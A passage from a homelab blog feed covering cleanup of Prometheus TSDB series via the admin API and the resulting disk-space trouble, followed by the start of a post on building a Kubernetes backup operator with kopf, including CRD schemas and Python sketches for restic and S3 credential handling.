</span></span><span style="display:flex;"><span>curl -X POST -g <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PROMETHEUS_SERVER<span style="color:#e6db74">}</span><span style="color:#e6db74">/api/v1/admin/tsdb/clean_tombstones&#34;</span>
</span></span></code></pre></div><p>It takes the aforementioned list and calls the series deletion API for each of
the lines in that file, assuming that each line only contains the name of a
metric to be deleted.
Once that&rsquo;s done, it calls the tombstone cleaning API, which really deletes
the series from the TSDB.</p>
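<p>One thing worth mentioning: both the series deletion and the tombstone cleaning endpoints
are part of Prometheus&rsquo; admin API, which is disabled by default. With kube-prometheus-stack
it should be a single values flag; a sketch, assuming the Helm release is called
<code>monitoring</code>:</p>
<pre tabindex="0"><code>helm upgrade monitoring prometheus-community/kube-prometheus-stack \
  --namespace monitoring --reuse-values \
  --set prometheus.prometheusSpec.enableAdminAPI=true
</code></pre>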
<p>The first part of the script ran through perfectly fine for me. But the cleaning
of the tombstones failed:</p>
<pre tabindex="0"><code>&#34;status&#34;:&#34;error&#34;,&#34;errorType&#34;:&#34;internal&#34;,&#34;error&#34;:&#34;clean tombstones: /prometheus/01HSKJ3DX27WGS1NZTS0F87K6V: 2 errors: preallocate: no space left on device; sync /prometheus/01HZW9FS0W6JT1R0YJ1ZTH332N.tmp-for-creation/chunks/000011: file a
</code></pre><p>And no, I did not accidentally cut off the message there - that&rsquo;s all the Prom
API sent. &#x1f601;
So I had left it too late. Prometheus didn&rsquo;t even have enough space left on the
volume to execute the tombstone deletion.</p>
<p>Prometheus stores data in chunks on the disk, each containing all the data for a
specific time period. When you delete data, it has to open every chunk which
contains data from the metric to be removed, remove that data and then
write out a new chunk. And it did not have enough space left to write out the
new chunk while the old chunk still existed.
In the end I capitulated and increased the size of the Prometheus volume again,
by another 20 GB. That was enough.
This is one of the reasons why I like to use S3 whenever I can. When I run out
of space there, I just need to throw in another disk, no mucking about with
volume sizes.</p>
<p>Increasing the volume size was not entirely simple, because the PVC is controlled
not by a manually created manifest or even a Helm chart, but is instead
created by the Prometheus operator when running the <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>.
As a consequence, updating the size has to follow a specific process, which is
documented <a href="https://github.com/prometheus-operator/prometheus-operator/blob/main/Documentation/user-guides/storage.md#resizing-volumes">here</a>.
That was a pretty humiliating defeat. &#x1f626;</p>
<p>The tombstone cleanup is also pretty compute and memory intensive. Here&rsquo;s the
CPU consumption of the Prometheus container:</p>
<figure>
    <img loading="lazy" src="cpu.png"
         alt="A Grafana time series plot. It shows the time from 20:00 on one day to 12:30 on the next. On the Y axis it shows CPU utilization. There is only one curve, which starts rather constant around 0.14 and then goes up to 0.6 around 20:30. It stays there until 21:30, when it goes up to its maximum of 0.85. It stays there for 1.5h and then goes down to 0.4 for 30 minutes, until going up to 0.82 again. The utilization drops again to fluctuating between 0.53 and 0.66 at 00:30 and roughly stays there. At 12:30 the next day, it finally goes back to the initial 0.14."/> <figcaption>
            <p>CPU utilization of the Prometheus container during tombstone cleaning.</p>
        </figcaption>
</figure>

<figure>
    <img loading="lazy" src="memory.png"
         alt="A Grafana time series plot. It shows the time from 20:00 on one day to 12:30 on the next, similar to the previous plot. On the Y axis, this one shows the memory consumption in Gigabytes. There is only one curve, which starts out at around 500 MB and then goes up to around 850 MB at 20:30. It stays around that level until 00:30, when it goes up to 900 MB. Over the next couple of hours, the memory consumption constantly increases until it reaches its 1.6 GB peak around 10:00 the next morning."/> <figcaption>
            <p>Memory utilization of the Prometheus container during tombstone cleaning.</p>
        </figcaption>
</figure>

<h2 id="future-approaches">Future approaches</h2>
<p>All the above being said, the entire action was not really much of a success.
The percentage disk utilization plot I showed in the beginning looks rather
impressive, dropping the disk utilization by about 30%. But quite frankly:
That&rsquo;s mostly due to the 20 GB increase in the volume size. Not because of my
cleanup. A more realistic picture can be seen here, which is the bytes used of
the Prometheus volume up to today:</p>
<figure>
    <img loading="lazy" src="used-bytes.png"
         alt="A Grafana time series plot. It shows the time from March 31st to June 28th. The curve grows consistently from 68 GiB to 104 GiB until June 9th, where it drops to 87 GiB. Then it rises again constantly until it reaches 95 GiB on June 28th."/> <figcaption>
            <p>Used bytes on the Prometheus volume in GiB.</p>
        </figcaption>
</figure>

<p>This rate of growth isn&rsquo;t really sustainable in the current setup. I will
constantly run out of space on the volume. I could of course radically cut down
on the retention period or on the metrics scraped, but I really don&rsquo;t want to.</p>
<p>So in the near future, I will have to have a look at <a href="https://thanos.io/">Thanos</a>.
It is already supported in kube-prometheus-stack, and it can provide long term
storage in S3, which I prefer over disk volumes.</p>
<p>But that project has to wait until the k8s migration is done. I hope that I won&rsquo;t
have to repeat this action until that&rsquo;s completed.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelab Backup Operator Part II: Basic Framework</title>
      <link>https://blog.mei-home.net/posts/backup-operator-2-basic-framework/</link>
      <pubDate>Sat, 25 May 2024 19:40:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/backup-operator-2-basic-framework/</guid>
      <description>My first steps in the operator implementation with kopf</description>
      <content:encoded><![CDATA[<p>In the <a href="https://blog.mei-home.net/posts/backup-operator-1-rbac-issues/">last post</a>
of my <a href="https://blog.mei-home.net/tags/hlbo/">Backup Operator series</a>, I lamented the state
of permissions in the <a href="https://github.com/nolar/kopf">kopf</a> Kubernetes Operator
framework. After some thinking, I decided to go ahead with kopf and just accept
the permission/RBAC ugliness.</p>
<p>I&rsquo;ve just finished implementing the first cluster state change in the operator,
so I thought this is a good place to write a post about my approach and setup.</p>
<p>The journey up to now has been pretty interesting. I learned a bit about the
Kubernetes API, and a lot about how cooperative multitasking with coroutines
works in Python.</p>
<h2 id="why-write-an-entire-operator">Why write an entire operator?</h2>
<p>I&rsquo;ve already written some things about my backup setup in
<a href="https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/">the Kubernetes migration post</a>
which triggered this operator implementation.</p>
<p>Just to give a short refresher: I need to run daily backups on the persistent
volumes and S3 buckets of the services running in my Homelab. I&rsquo;m currently
doing that by launching a run-to-completion job on every one of my Nomad hosts
which backs up all the volumes which happen to be mounted on that host at the
time.
I can&rsquo;t do that in k8s, because it seems to lack a run-to-completion,
run-on-every-host type of workload. <a href="https://kubernetes.io/docs/concepts/workloads/controllers/job/">Jobs</a>
can do the run-to-completion part, and <a href="https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/">DaemonSets</a>
can do the run-on-every-host part, but there doesn&rsquo;t seem to be a workload type
which can do both in one.
And that&rsquo;s why I&rsquo;ve decided to go with writing my own operator. There are two
main benefits this approach will have, compared to my previous one. First, I
will be able to explicitly schedule the second stage of my backup, backing up
certain backups onto an external disk. Right now, I just schedule that phase an
hour after the previous one.
Second, I will be able to package the backup config for each individual service.
In my current approach, I have the definition of which volumes and buckets to
back up configured in the backup job&rsquo;s config. With the Kubernetes operator, I
will introduce a CRD that can be deployed together with each service, e.g. as
part of the Helm chart.</p>
<h2 id="overview-of-the-approach">Overview of the approach</h2>
<p>As I&rsquo;ve mentioned above, I will write the operator in Python and use the
<a href="https://github.com/nolar/kopf">kopf</a> framework to do it. This is simply
because I&rsquo;m currently familiar with three languages: C++, C and Python. And
Python is the most comfortable of the three.
Due to the RBAC problems I described <a href="https://blog.mei-home.net/posts/backup-operator-1-rbac-issues/">in my last post</a>, I briefly looked into other possibilities. But the Kubernetes ecosystem seems
to mostly live in Golang, which I haven&rsquo;t written anything in yet. And the main
goal currently is to get ahead with the Homelab migration to k8s, not to learn
yet another programming language. &#x1f642;</p>
<p>There will be a total of three custom resources the operator will look for.
The first one, HomelabBackupConfig, will be a one-per-cluster resource and
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apiextensions.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CustomResourceDefinition</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelabbackupconfigs.mei-home.net</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scope</span>: <span style="color:#ae81ff">Namespaced</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#ae81ff">mei-home.net</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">names</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabBackupConfig</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">plural</span>: <span style="color:#ae81ff">homelabbackupconfigs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">singular</span>: <span style="color:#ae81ff">homelabbackupconfig</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">versions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">v1alpha1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">served</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">schema</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">openAPIV3Schema</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;This object describes the general configuration of all backups created by the Homelab backup operator.&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">serviceBackup</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The configuration for all service level backups created by the operator instance.&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">schedule</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The schedule on which all service level backups will be executed.&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">scratchVol</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the PVC for scratch space. Needs to be a RWX volume.&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">s3BackupConfig</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Configuration for S3 access to the backup buckets.&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">s3Host</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 server hosting the backup buckets.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 credentials for the backup S3 user.&#34;</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">secretName</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the Secret containing the credentials.&#34;</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">accessKeyIDProperty</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_ACCESS_KEY_ID&#34;</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">secretKeyProperty</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_SECRET_ACCESS_KEY&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">s3ServiceConfig</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Configuration for S3 access to the service buckets which should be backed up.&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">s3Host</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 server hosting the buckets which should be backed up.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 credentials for the service S3 user.&#34;</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">secretName</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the Secret containing the credentials.&#34;</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">accessKeyIDProperty</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_ACCESS_KEY_ID&#34;</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">secretKeyProperty</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_SECRET_ACCESS_KEY&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">resticPasswordSecret</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The Secret with the Restic password for the backups.&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">secretName</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the Secret containing the password.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">secretKey</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName Secret which contains the Restic password.&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">jobSpec</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Configuration of the Job launched for each service backup.&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The container image to be used for all service Jobs.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">array</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The command handed to Job.spec.template.containers.command&#34;</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">array</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Additional entries for the containers.env list. These entries cann only be of the name,value variety. Other forms of env entries are not supported for now.&#34;</span>
</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the env variable to add.&#34;</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">value</span>:
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The value of the env variable to add.&#34;</span>
</span></span></code></pre></div><p>This resource configures all of the common settings which will be shared by
all of the individual service backups I will describe next.</p>
<p>My backups will run with <a href="https://restic.net/">restic</a>, backing up each service
into its own S3 bucket on my Ceph Rook cluster.
As all service level backups work like this and back up to the same
S3 service, it makes sense to centralize the configuration instead of copying
it into every service backup CRD.
This configuration happens in the <code>s3BackupConfig</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">s3BackupConfig</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Configuration for S3 access to the backup buckets.&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3Host</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 server hosting the backup buckets.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 credentials for the backup S3 user.&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the Secret containing the credentials.&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_ACCESS_KEY_ID&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_SECRET_ACCESS_KEY&#34;</span>
</span></span></code></pre></div><p>Flexibility in what the k8s Secrets have to look like is pretty important to me.
I&rsquo;ve been annoyed with some of the Helm charts I&rsquo;ve been using because they
prescribe exactly what the properties in the Secret need to be named,
so I introduced config options here to define not only the Secret&rsquo;s name, but
also the names of the properties holding the access and secret keys for the S3
credentials.
The <code>s3ServiceConfig</code> has the same structure, but will be used for the
credentials for accessing the S3 buckets of services, instead of the S3 backup
buckets.</p>
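<p>To make that a bit more concrete: when the operator eventually needs the actual credentials,
it will have to read the configured Secret and pick out the configured properties. A minimal
sketch of what that lookup might look like with kubernetes_asyncio &mdash; the helper name is made
up, and this is not implemented in the operator yet:</p>
<pre tabindex="0"><code>import base64

from kubernetes_asyncio import client


async def read_s3_credentials(api, namespace, creds_spec):
    # creds_spec is the s3Credentials object from the CRD, e.g.
    # {"secretName": "backup-s3", "accessKeyIDProperty": "access",
    #  "secretKeyProperty": "secret"}
    core = client.CoreV1Api(api)
    secret = await core.read_namespaced_secret(creds_spec["secretName"], namespace)
    # Secret data values are base64 encoded
    access_key = base64.b64decode(secret.data[creds_spec["accessKeyIDProperty"]]).decode()
    secret_key = base64.b64decode(secret.data[creds_spec["secretKeyProperty"]]).decode()
    return access_key, secret_key
</code></pre>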
<p>The <code>resticPasswordSecret</code> points to the Secret holding the restic password
used to unlock the restic encryption keys.</p>
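<p>restic reads the repository password from the <code>RESTIC_PASSWORD</code> environment
variable, so my current plan is to inject the configured Secret into the backup Jobs via a
secretKeyRef. Just a sketch of that idea, as the Job creation isn&rsquo;t implemented yet:</p>
<pre tabindex="0"><code>from kubernetes_asyncio import client


def restic_password_env(password_spec):
    # password_spec is the resticPasswordSecret object from the CRD, e.g.
    # {"secretName": "restic-pw", "secretKey": "password"}
    return client.V1EnvVar(
        name="RESTIC_PASSWORD",
        value_from=client.V1EnvVarSource(
            secret_key_ref=client.V1SecretKeySelector(
                name=password_spec["secretName"],
                key=password_spec["secretKey"],
            )
        ),
    )
</code></pre>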
<p>Finally, there&rsquo;s the <code>jobSpec</code>. This will likely still change in the future,
as I have not yet implemented that part. This spec will be used to create the
<a href="https://kubernetes.io/docs/concepts/workloads/controllers/job/">Jobs</a> which
will run the actual backup. One will be created for each of the
HomelabServiceBackup instances I will describe next. I will not go into detail
on this part of the CRD today and instead keep it until I&rsquo;ve actually implemented
the Job creation.</p>
<p>Then there&rsquo;s the HomelabServiceBackup CRD:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apiextensions.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CustomResourceDefinition</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelabservicebackups.mei-home.net</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scope</span>: <span style="color:#ae81ff">Namespaced</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#ae81ff">mei-home.net</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">names</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabServiceBackup</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">plural</span>: <span style="color:#ae81ff">homelabservicebackups</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">singular</span>: <span style="color:#ae81ff">homelabservicebackup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">versions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">v1alpha1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">served</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">schema</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">openAPIV3Schema</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;This object describes the configuration of the backups for a specific service.&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">backupBucketName</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the S3 bucket to which the backup should be made.&#34;</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">array</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The elements, like PVCs and S3 buckets to back up for this service.&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The Type of the element, either s3 or pvc.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">enum</span>:
</span></span><span style="display:flex;"><span>                          - <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>                          - <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the element, either the name of an S3 bucket or a PVC&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">status</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Status of this service backup&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">nextBackup</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Date and time of the next backup run&#34;</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">lastBackup</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Status of latest backup&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">properties</span>:
